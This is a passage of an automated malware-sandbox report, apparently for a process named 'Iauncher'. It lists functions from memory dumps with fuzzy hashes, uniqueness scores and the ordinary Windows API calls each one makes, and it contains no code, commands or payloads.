Opcode Fuzzy Hash: 49d0258f9db37e1cdd5fef3774d7f63c3a1bf107ccbaa37394c3c5cdc50eb35a
Instruction Fuzzy Hash: DA121735D10219DEDB10EFA4C844BD9BBB1FF9A300F51869AE5097B260EB70AAD5CF41

Uniqueness

Uniqueness Score: -1.00%

Function 09F1A8A1 Relevance: .4, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be20b580956bdb7deb8b7606a7956f1487c7891ce888269fd24176175887d080
Instruction ID: 938a624e4fdaa144da6d62d01c1d3bda3743dd2c8020cfceb9942e664f2db816
Opcode Fuzzy Hash: be20b580956bdb7deb8b7606a7956f1487c7891ce888269fd24176175887d080
Instruction Fuzzy Hash: 06021835D10219DFDB11EFA4C844BD9BBB2FF9A300F51829AE5096B260EB709AD5CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0744F531 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3520062824.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7440000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8020f73ef69ddc5ac78efc0f55a944bc284418f81c08eafbf7e4292513f3722
Instruction ID: e3c034020ec345a671983a74afc45de18d929b8bbd9b93dff4dd9ce16f3def2b
Opcode Fuzzy Hash: e8020f73ef69ddc5ac78efc0f55a944bc284418f81c08eafbf7e4292513f3722
Instruction Fuzzy Hash: 13D141B0A00305DFEB14DFA5C848BAEBBF1BF45304F19855AE409AB365DB70E949DB81

Uniqueness

Uniqueness Score: -1.00%

Function 07925A10 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3520316307.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7920000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b97da0ec2d873ea33ce3e27abbf29f53976cba5494b2ad683ec10adbf5c9bec4
Instruction ID: 69c6dd8eb372ed6f1f1b143ebfe23af22ba86c6c2fc3f8aa1bcea1a53fc0e86d
Opcode Fuzzy Hash: b97da0ec2d873ea33ce3e27abbf29f53976cba5494b2ad683ec10adbf5c9bec4
Instruction Fuzzy Hash: 80E1E735900229DFEB10DF68C844B99FBB2FF4A300F0196E9E54DA7261DB309A94DF52

Uniqueness

Uniqueness Score: -1.00%

Function 05CBAC28 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8871c540d8793d37c07e5823fb6914c9a298a4d2cc4f07d157fc08565444f37
Instruction ID: 35c5b2f17dd24b5d4038546fbf01e234d6dea0a347c06e1011732bf677266497
Opcode Fuzzy Hash: d8871c540d8793d37c07e5823fb6914c9a298a4d2cc4f07d157fc08565444f37
Instruction Fuzzy Hash: F9C13971E002189FEB15CF65D880BDDBBB2BF88304F14C9AAD449AB255DBB0DA85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 09F1CDAC Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 204141b29e5957763578ba4c990b2e80a7ad36f3315a159aa30fca2c907bfda5
Instruction ID: 366dfacd378bb3864b5747e5a79ec005e206537b4c7eca219817b74a4022d00f
Opcode Fuzzy Hash: 204141b29e5957763578ba4c990b2e80a7ad36f3315a159aa30fca2c907bfda5
Instruction Fuzzy Hash: 5C512235E112189FEB048FA9C4587FEBBF4AF49346F046469E405A72D0DB798A84CB94

Uniqueness

Uniqueness Score: -1.00%

Function 09F191F0 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f60534b488c108c10e95f78508ff01889a08ade423c8e4317eb963314063176
Instruction ID: b0ecd6b15e1109fd8f86cd7a84eeac68c81e1f7f401cc60aeb70fd1b70372e99
Opcode Fuzzy Hash: 4f60534b488c108c10e95f78508ff01889a08ade423c8e4317eb963314063176
Instruction Fuzzy Hash: 3A41D375E012189FDF04EFE5D9549EDFBB6BF8A300F10A02AD405BB264DB705946DB84

Uniqueness

Uniqueness Score: -1.00%

Function 04E02E50 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E041C2

Memory Dump Source

Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0451b6856ec5646e8518cae83853326f7a16f7a31b3d1a340333cbc8054517a4
Instruction ID: d400ad1d961ef92ce34e2c7f2c9cbe93944884de7a9f8f9c5d71b1bbbdf785e2
Opcode Fuzzy Hash: 0451b6856ec5646e8518cae83853326f7a16f7a31b3d1a340333cbc8054517a4
Instruction Fuzzy Hash: 8551C4B1D003199FDB14CF99C984ADEBBF5FF48314F24822AE919AB250D770A885CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04E040A4 Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E041C2

Memory Dump Source

Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2698e3533fd45ad7b663518aaae366ad75bdd0cf876322a9e9d349841da7848c
Instruction ID: 720c6060b20f2246b50f3a6712a3a4f5b832abd5b37479399284388aa54a061d
Opcode Fuzzy Hash: 2698e3533fd45ad7b663518aaae366ad75bdd0cf876322a9e9d349841da7848c
Instruction Fuzzy Hash: F451E3B1D00319DFDF14CF99D984ADEBBB1BF48314F24822AE919AB250D774A885CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B673AC Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00B67469

Memory Dump Source

Source File: 00000000.00000002.3508225322.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_Iauncher.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f83f4d6d99157a19e0c0283754e231caebb3974a2ca4b978ee43199c0c83bc0d
Instruction ID: d830fdba7953563cb268d9263dcc975cc627819961434fca2a97b87caa9d42e8
Opcode Fuzzy Hash: f83f4d6d99157a19e0c0283754e231caebb3974a2ca4b978ee43199c0c83bc0d
Instruction Fuzzy Hash: 3C41D2B0C04719CBDB24DFA9C848BDEBBF5BF48314F20816AD419AB251DB75694ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 04E02FA4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04E06731

Memory Dump Source

Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 74e0b4b61cd36080319b7e6817efbe759c493014fffd706bfa9c5453982a36ea
Instruction ID: e6b674b9ac7c11cef8e0e7a9b87a7dec2dad80e297622f14d7e3877ee4c60d18
Opcode Fuzzy Hash: 74e0b4b61cd36080319b7e6817efbe759c493014fffd706bfa9c5453982a36ea
Instruction Fuzzy Hash: DF4128B8900305DFDB14CF99C488BAABBF5FF88314F24C499D519AB361D774A881CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B65E24 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00B67469

Memory Dump Source

Source File: 00000000.00000002.3508225322.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_Iauncher.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2b664893fe61349252d4c55eca969689d7cc1e4e87639f43a8ec9b2c8168fc61
Instruction ID: c4073756fc383d2ada4a4caaa9715669df22ba10ccd93e284ae62a1200b54a2c
Opcode Fuzzy Hash: 2b664893fe61349252d4c55eca969689d7cc1e4e87639f43a8ec9b2c8168fc61
Instruction Fuzzy Hash: 7C41C2B0C04719CBDB24DFA9C844B9EBBF5BF48304F2080AAD409AB251DB756949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05CBB560 Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 88ba222a8458378749563473d3424ab829a5276b5fabf50496acdfadebb2dee5
Instruction ID: c2ac902d5774faa1b4b7d0c1b780e50c7e779c8d67cee236804a4da9d50e5694
Opcode Fuzzy Hash: 88ba222a8458378749563473d3424ab829a5276b5fabf50496acdfadebb2dee5
Instruction Fuzzy Hash: 523189B29043489FDB02DFA9C804AEEBFF8FF09310F14849AE954A7261C3359954DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 05CB11D2 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 05CB126A

Memory Dump Source

Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 55d4b32f74f304c70d61b7f4700df57fc6ab88466dd01704277c23faca6703ad
Instruction ID: bb8157674bfdcebbf7105ae111f71a8bb6df720ab7b961d046c5892c0cbec4a2
Opcode Fuzzy Hash: 55d4b32f74f304c70d61b7f4700df57fc6ab88466dd01704277c23faca6703ad
Instruction Fuzzy Hash: 3C2157B68043498FDB14CF9AC845BDEBBF4EF48320F14846ED858A7252C778A546CF65

Uniqueness

Uniqueness Score: -1.00%

Function 05CB12A8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 05CB135C

Memory Dump Source

Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 3b18b3691972cfb5d3f4a754c8b2a5df6e3e73b62fe4f42187601282dfd43319
Instruction ID: 763a7c7a72c02463c997795a0f2e581897e6934fb621798db0216f28a1120d59
Opcode Fuzzy Hash: 3b18b3691972cfb5d3f4a754c8b2a5df6e3e73b62fe4f42187601282dfd43319
Instruction Fuzzy Hash: 5C2125B1D016098FEB04CF9AC8806DAFBF0BF88314F28856ED418A7711E3759906CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00B6F350 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B6FA4E,?,?,?,?,?), ref: 00B6FB0F

Memory Dump Source

Source File: 00000000.00000002.3508225322.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_Iauncher.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b9d791422ec58b987a75c8e203ed773d448d0304cae4eae9b1e0086a2d08e3ae
Instruction ID: fed70d4e3cdf190769b110ff48b428b42841049873aab3b3f0f2c8032b5e95a3
Opcode Fuzzy Hash: b9d791422ec58b987a75c8e203ed773d448d0304cae4eae9b1e0086a2d08e3ae
Instruction Fuzzy Hash: 4521E5B5D002499FDB10CF9AD884AEEBBF4FB48310F14805AE918A3350D778A954CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05CB12DA Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 05CB135C

Memory Dump Source

Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 3ea7c3fc908b10b221f925b28fa5cf24982f96bdd7d577b7a2ac925766cddced
Instruction ID: 7957e8b37b6d42834529d9e1cd069c2bc7948a86a0666a311794f9a83d946a8e
Opcode Fuzzy Hash: 3ea7c3fc908b10b221f925b28fa5cf24982f96bdd7d577b7a2ac925766cddced
Instruction Fuzzy Hash: 282137B1D013098FDB14CF9AC884ADEFBF8FB48320F14852EE819A3640D378A904CB64

Uniqueness

Uniqueness Score: -1.00%

Function 05CB12E0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 05CB135C

Memory Dump Source

Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: fe30ef9731bcb1ae78160359239b61a4b3b0861718b217bb2cb3e8f012fde03a
Instruction ID: 258bd4a59a44be4b81b81a31475e0b8bb487655883f3c598ba6b489da6317c47
Opcode Fuzzy Hash: fe30ef9731bcb1ae78160359239b61a4b3b0861718b217bb2cb3e8f012fde03a
Instruction Fuzzy Hash: 7A2115B1D017098FDB14CF9AD884ADEFBF4FB48320F14852ED819A3640D774A944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05CBA568 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05CBB57A,?,?,?,?,?), ref: 05CBB61F

Memory Dump Source

Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: da39688c8620bf9e70851721508f5f0e8f4cd2773e55b815ce5cf41adb8e599a
Instruction ID: ed491019a7df7c40e8959be850ec23e083844d84bf743308a98e9fcbb78131e2
Opcode Fuzzy Hash: da39688c8620bf9e70851721508f5f0e8f4cd2773e55b815ce5cf41adb8e599a
Instruction Fuzzy Hash: A71156B180034D9FDB10CF9AC844BEEBFF8EB48320F14841AE955A3250C375A954DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B6CFC8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00B6D881,00000800,00000000,00000000), ref: 00B6DA92

Memory Dump Source

Source File: 00000000.00000002.3508225322.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_Iauncher.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: afcddee40a6b56f3869447001fc63ce20c806d5eb7ad046476df281be5fb8c58
Instruction ID: be58bbff8ecce9a4e9a3c82b18ab4b4d5ff298982e3be0ba97883d40a3327a59
Opcode Fuzzy Hash: afcddee40a6b56f3869447001fc63ce20c806d5eb7ad046476df281be5fb8c58
Instruction Fuzzy Hash: E51144B6D043488FDB10CF9AC444ADEFBF4EB48310F10846EE919A7200C379A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05CB1200 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 05CB126A

Memory Dump Source

Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 662d8f626c4f3ac8cb59e244805381e7be19e82a03c2d88ff90e4498b718eb81
Instruction ID: e0fec859cd40090d0a02deb70a883de431e40dd06db3cadbf376d2d3631deb72
Opcode Fuzzy Hash: 662d8f626c4f3ac8cb59e244805381e7be19e82a03c2d88ff90e4498b718eb81
Instruction Fuzzy Hash: 291112B6C002098FDB14CF9AC844BDEFBF4EB88320F14842AD859A3240D778A645CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0744FA3E Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 0744FAA8

Memory Dump Source

Source File: 00000000.00000002.3520062824.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7440000_Iauncher.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 7bf70b1d91901eaca4e3795a5b618c076b37d3aaa1692ca13ea133b255374b50
Instruction ID: 89af2566794f5a274163dac6392f1f924e59743e31344d8ace05d0f636cb5e2b
Opcode Fuzzy Hash: 7bf70b1d91901eaca4e3795a5b618c076b37d3aaa1692ca13ea133b255374b50
Instruction Fuzzy Hash: 7811F6B6C002499FDB10CF9AD944BDEBBF8EB48320F14842AE918A3251C378A544DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07449DC2 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07449E25

Memory Dump Source

Source File: 00000000.00000002.3520062824.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7440000_Iauncher.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: f37233f6ab7c07bc7dbed6995a6e59a1b55b8f1ab5bc9831870a7dfe4671b2f9
Instruction ID: 62ebaef293d32279c4dc9b900408a654c90ae0a4ffbea15303d9078a8ccfb343
Opcode Fuzzy Hash: f37233f6ab7c07bc7dbed6995a6e59a1b55b8f1ab5bc9831870a7dfe4671b2f9
Instruction Fuzzy Hash: C81128B58003499FDB10CF9AC845BDFFBF8EB48320F10841AE558A3240C774A544DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0744FA40 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 0744FAA8

Memory Dump Source

Source File: 00000000.00000002.3520062824.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7440000_Iauncher.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: cad77da01013ffd31a0e0ea87cb24cb6643f9a9532c9e563f7b00e55276b86c5
Instruction ID: 2fe994a0e7cbfcf65f020510d298fe694c4f4e29da9bf32637057b2f6c0e6ccd
Opcode Fuzzy Hash: cad77da01013ffd31a0e0ea87cb24cb6643f9a9532c9e563f7b00e55276b86c5
Instruction Fuzzy Hash: B011F6B6C002499FDB10CF9AD944BDEBBF8EB48320F14842AE918A3251C378A544DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04E042B7 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,04E042E0,?,?,?,?), ref: 04E04355

Memory Dump Source

Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: ac232d58b791cfc89872544b4c0f1bde3c66ba95b32091d26246b6bc4ff0bbac
Instruction ID: 06a0b12ed68c43b46a9a86a2bbe560886c4ff44084ff18ff60f2763d7d2fccfd
Opcode Fuzzy Hash: ac232d58b791cfc89872544b4c0f1bde3c66ba95b32091d26246b6bc4ff0bbac
Instruction Fuzzy Hash: B81166B24043498FCB01DF84D848BDABFF4EF46310F05C197D2289B1A2C339A499CB61

Uniqueness

Uniqueness Score: -1.00%

Function 07920840 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 079208A5

Memory Dump Source

Source File: 00000000.00000002.3520316307.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7920000_Iauncher.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 631645f803c5d42ab238952cc490c813163795d9cc7a3a740f839ddd91d21e17
Instruction ID: c694e96cc6614160c4e8cfa3e37f95a5ddf319c9a766b19806996023e4f517e2
Opcode Fuzzy Hash: 631645f803c5d42ab238952cc490c813163795d9cc7a3a740f839ddd91d21e17
Instruction Fuzzy Hash: 8D1110B5C043599ECB10DF9AD844ACEFBF4EB48324F10852AD819A3610C779A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0744A7E8 Relevance: 1.5, APIs: 1, Instructions: 49comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0744A845

Memory Dump Source

Source File: 00000000.00000002.3520062824.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7440000_Iauncher.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 61a38b43b9e214d9eee7ef095936dffe28c768b9d73618235d4fc51d7e14e38e
Instruction ID: a60001f786dfbcfa13270bf1a394e5eeaf6bab0f3889fb2880d8f8e037651ba2
Opcode Fuzzy Hash: 61a38b43b9e214d9eee7ef095936dffe28c768b9d73618235d4fc51d7e14e38e
Instruction Fuzzy Hash: 4B1133B59003488FDB20DF9AD449BCEBFF4EB48324F10841AD519A3640D778AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07449DC8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07449E25

Memory Dump Source

Source File: 00000000.00000002.3520062824.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7440000_Iauncher.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c35aa6288962b2822228d2f307833a000a047ccae62db9293c4700c1a0c045c7
Instruction ID: 81827d1bbd3491344c607a698ff58b2bde541e28bb84513648e0ed4e71342cd1
Opcode Fuzzy Hash: c35aa6288962b2822228d2f307833a000a047ccae62db9293c4700c1a0c045c7
Instruction Fuzzy Hash: 2B1106B58003499FDB10CF9AC845BEFFBF8EB48320F14845AE958A3241D779A544DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B6D7A0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00B6D806

Memory Dump Source

Source File: 00000000.00000002.3508225322.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_Iauncher.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9f65dd08fa76e5719cc1c95cedb6776dfa27cf89ff13ee8b084ec863f2ddee96
Instruction ID: 6cade42fc0a35b50c956fcd3d010e7a1567bf5a167e536b3fb3f4375de5dca3a
Opcode Fuzzy Hash: 9f65dd08fa76e5719cc1c95cedb6776dfa27cf89ff13ee8b084ec863f2ddee96
Instruction Fuzzy Hash: 4211E0B6D003498FCB14DF9AD848ADEFBF4EB88320F10846AD819B7251C779A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05CB1D48 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,05CB1D39,?,?,00000000), ref: 05CB1DAD

Memory Dump Source

Source File: 00000000.00000002.3517677030.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Iauncher.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cd04912a2d83dea4bd3f1a0582319d7874de35b272a9a2e6710119d1fee1ead5
Instruction ID: 70fe6148b7b5972e9bc0dfd3528fab80e60150cf92f8b9b700f2ad1c50d9ccb7
Opcode Fuzzy Hash: cd04912a2d83dea4bd3f1a0582319d7874de35b272a9a2e6710119d1fee1ead5
Instruction Fuzzy Hash: CB1106B58003489FDB10DF9AC885BDEBBF8FB48320F148459E519A3240C379A644CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04E02E8C Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,04E042E0,?,?,?,?), ref: 04E04355

Memory Dump Source

Source File: 00000000.00000002.3514840819.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_Iauncher.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: e440dffd38b530427b90ae919e6a3c1e2016758fd3a3ac3a710ba07a6e24f565
Instruction ID: 0a7793547042e8730c6b858c82a46e0525a1eef09c0db0eb2458f210891cb09c
Opcode Fuzzy Hash: e440dffd38b530427b90ae919e6a3c1e2016758fd3a3ac3a710ba07a6e24f565
Instruction Fuzzy Hash: D211F5B59003499FDB10DF9AC549BDEFBF8EB48324F108459D929A7380C375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 09F1E034 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,027F6428,?,?), ref: 09F1EFBD

Memory Dump Source

Source File: 00000000.00000002.3521993483.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9f10000_Iauncher.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 3621a81cabc19a88d32e9aa2d168c2818ecc666d1107fade36043471bcd11426
Instruction ID: 6d5733132c42ba9bd8810eaad0ed1da1b40df432d165b1290a6ce666155410bf
Opcode Fuzzy Hash: 3621a81cabc19a88d32e9aa2d168c2818ecc666d1107fade36043471bcd11426
Instruction Fuzzy Hash: B611F2B58043489FDB10DF9AC849BDEBBF8EB48320F108459E919A7240C375A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05CB179A Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 05CB17FD

Memory Dump Source

